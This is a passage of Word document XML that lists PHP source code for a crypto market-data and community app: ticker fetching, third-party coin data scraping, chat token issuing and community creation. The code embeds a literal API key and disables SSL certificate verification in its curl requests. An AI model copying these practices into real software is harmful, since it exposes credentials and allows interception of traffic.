      </w:r>
    </w:p>
    <w:p w14:paraId="44EC92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C138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xchange-&gt;has['fetchTickers']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B09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s = ($exchange-&gt;fetch_tickers ());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5742F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3E5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tickers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B8C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None');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B81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exchange'] = $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDBD1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int)(microtime(true)*1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F465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atch_no'] = md5(uniqid(mt_rand(), true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F7A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ickers as $ticker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53431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42B0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xchange'] = $id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8C8A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ymbol'] = $ticker['symbol'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46978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cker_timestamp'] = $ticker['timestamp'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0E09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base_volume'] = $ticker['baseVolume'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B903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quote_volume'] = $ticker['quoteVolume'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2790B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ast_price'] = $ticker['last'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759FCA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open'] = $ticker['open'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E367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gh'] = $ticker['high'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD7E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ow'] = $ticker['low'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D1D2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lose'] = $ticker['close'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9034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hange'] = $ticker['change'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003F9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ercentage'] = $ticker['percentage'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2356E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ymbol'] = $ticker['symbol'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EAE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Db::name('ticker')-&gt;insert($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C219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CDA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ook::listen('action_log', $data['batch_no']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF11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Done');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79015C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597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date_coin_from_6pai() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3700B1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_time_limit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B82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Update Start---&lt;br&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249391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able('fx_coin')-&gt;chunk(100, function($coins) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C36E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uapi=function($currency) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A9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http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E068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ams=array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B23A4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pkey' =&gt; 'cad54e35284e0633a37411a8fd46a1cb',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0175D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cy' =&gt; $currency,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2065A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it' =&gt; 'USDT'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773601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D469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h =curl_init($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D653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SSL_VERIFYPEER, FALSE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2144B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USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F249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POST, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F417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POSTFIELDS, $params);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F25F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RETURNTRANSFER,TRUE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2F8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HEADER,FALSE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC61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st=curl_exec($httph);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1CF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httph);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A008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_decode($rst);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C0B3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48B85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6BC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oins as $coin) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397198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idata=$liuapi($coin['currency']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E2C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200==$apidata-&gt;status){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775CC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apidata-&gt;result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF1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fullname']=$result-&gt;summary-&gt;fullname;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BA6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fullname_zh']=$result-&gt;summary-&gt;fullname_zh;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122E0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describe']=$result-&gt;summary-&gt;introduction_zh;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721A6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introduction_zh']=$result-&gt;summary-&gt;introduction_zh;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CE4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white_paper']=$result-&gt;summary-&gt;whitepaper;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F51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circulation']=$result-&gt;summary-&gt;circulation;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E43CE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market_value']=$result-&gt;summary-&gt;circulation_value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A61D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block_url']=$result-&gt;summary-&gt;blockchain_site;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D1D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official_website']=$result-&gt;summary-&gt;website;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7F18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total_circulation']=$result-&gt;summary-&gt;total_circulation;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4C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currency',$coin['currency'])-&gt;update($coin);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C63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 ' . $coin['currency'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>更新完成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>---&lt;br&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA11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1D9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7A61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F4C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Update End---&lt;br&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C37A4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Exit');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBC8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97B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pdate_platform_from_feixiaohao(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783F4B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s['User-Agent']='Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43D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xpage=100;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59761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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2260A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ile($page &lt;= $maxpage) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720C0E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https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53970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h =curl_init($url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64375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SSL_VERIFYPEER, FALSE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3971D8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USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8E4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RETURNTRANSFER,TRUE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C94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OPT_HTTPHEADER, $headers);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75477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httph, CURLINFO_HEADER_OUT, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C16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st=curl_exec($httph);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF6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httph);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3303A5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json_decode($rst);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF83A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data-&gt;currpage;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F50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xpage=$data-&gt;maxpage;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21989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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754194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data-&gt;data as $pf) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF95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platform')-&gt;where('exchange', $pf-&gt;id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B43A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fa=get_object_vars($pf);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8F66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fa['symbol_num']=$pfa['pairnum'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2462F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fa['exchange']=$pfa['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029F66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fa['kind']='</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易所</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38287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pfa['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03233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9E9EB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latform')-&gt;where('exchange', $pfa['exchange'])-&gt;strict(false)-&gt;update($pfa);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEBF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0BFD9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b::name('platform')-&gt;strict(false)-&gt;insert($pfa);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B010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E45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0DFE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Done');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE2D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73F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B352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121AD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53FE7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64F962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Db;       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E504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Session;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796F7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RongCloud\RongCloud;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E0E4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Rong extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259B3D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FA13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rong;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779F8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member=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9DFC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4DFADB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2BC8FA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name','switch')-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58350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05D8BD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 || $config==0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D9AB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会员未开放</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A109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F0A3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Session::get('user','ffxiangUser') ? Session::get('user','ffxiangUser') : input('post.token');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C7DA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0B5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aaa){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0018C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tokenaaa;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5113F3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634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token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC927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8F3AC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333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497F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decrypt($token);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B77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1243A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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不正确，请重新获取</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>token']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FB0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157F1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D207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user($uid);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65756C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64C77F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547591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3D6555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73999E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67670A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771D3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8011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726E6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A6345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0D76F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281960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70A84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04035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err'=&gt;'</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0EA0FC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09A0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796DCE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497D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0A6E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E1A41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账户审核被拒绝</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405990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471AEC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审核被拒绝，拒绝原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$member['hidetent']];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555F2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62D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6FE9F9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E09A4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2FFF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A79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42C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不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE3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9AE0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4C0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member;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53515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rong'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BC5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rong = new RongCloud($config['appKey'],$config['appSecret']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618CB8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8E3B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oken(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6181D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this-&gt;rong-&gt;user()-&gt;getToken($this-&gt;member['id'], $this-&gt;member['username'], _imgUrl().$this-&gt;member['img']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D544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sult;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F3D6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6B19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CB424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5DBF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733B30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40D03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0F23E3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6ED17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74967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ircle extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A974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9C59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1C170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398FD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D5DD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70AE9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82A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30037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6F4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86A47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E1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0EE6F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A59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42435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2BCD6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02D7A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25C4E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member_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB54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7F048B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6C6570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0AACB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1F7AE4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489987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44E7A7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6178A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03BA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1C612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56B05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889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2BC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1A720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237E02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3436E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39860B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6807A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69D989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598CDE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52F8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070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5AA42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5FC158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177E8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6B29A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7C271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39961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4D5C5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8A8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7425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FCEA6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D5F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D392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399C3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5CFE4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2235AA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E81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B629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386758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C4D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F106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878C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85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create_type </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建社区分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7B4B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创建社区分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E119C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49DB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0E19F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AB72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tle     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区分类名称（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409C7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content   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区分类描述说明（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE956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社区分类创建成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E964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社区分类创建失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A19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DDE3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388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reate_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F937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D56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0BBFD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7042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创建社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4656A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4D87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694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11C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input('param.title', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0133D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title'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF5C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046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分类名称不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33386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68EB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BE1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FB0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 = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2D42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data['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F5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EC72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type)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2503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0F0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同名社区分类已存在，请更换社区分类名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FACD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3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349B3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0C4C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EF9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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1D21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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9E5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638BF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_id = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C65D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3A7BB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type_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37672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C3B9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社区分类创建成功，请等待后台审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E10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08A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E17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73F1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分类创建失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA38D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C83C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CB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059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B05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types </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获取社区分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FEB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社区分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DF4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CC61D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7784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circle_types  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区分类列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F82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社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444AB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String} title       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区分类标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029025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社区分类描述说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF96A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ircle_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户社区数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71755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987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s()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D1D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72BB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s = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06824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4DFCC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4966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_types) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D9C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_types as $key =&gt; $circle_type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F07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s[$key]['circle_num'] = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC00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circle_type['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A749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51D2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C77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517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_types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FCA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5DD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F73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create </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>创建社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AEE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创建社区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD2DD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738BF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C765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42440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tle     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区名称（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478FA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ype_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D55B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img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区图标（七牛图片文件名，</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eg. 042e820210812091212723761.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B551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描述说明（非必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A96D2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社区创建成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67092A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社区创建失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A07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89647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366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reate()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B43E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C57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C58E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391CC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F7769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30D1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创建社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B437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4CDA2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E64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A07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input('param.title', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497CC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title'] == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530FA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9A9E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名称不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A72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9284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68C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ECB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08D40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title', $data['title'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4932A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6D451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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A425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D389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同名社区已存在，请更换社区名称</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB73B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3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63712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A99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2434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_id'] = input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C02B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g'] = input('param.img', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40627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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D936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3BB229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3CE24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 = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F948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10CE5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id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C6B7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7D6A9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D332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 =&gt; $circle_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F734F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gt; $this-&gt;memberId,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B70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0A8CD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_in' =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DB6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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5B48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5808F5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ACD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34CED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社区创建成功，请等待后台审核</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394A7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E32B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1BD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3F2EA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社区创建失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
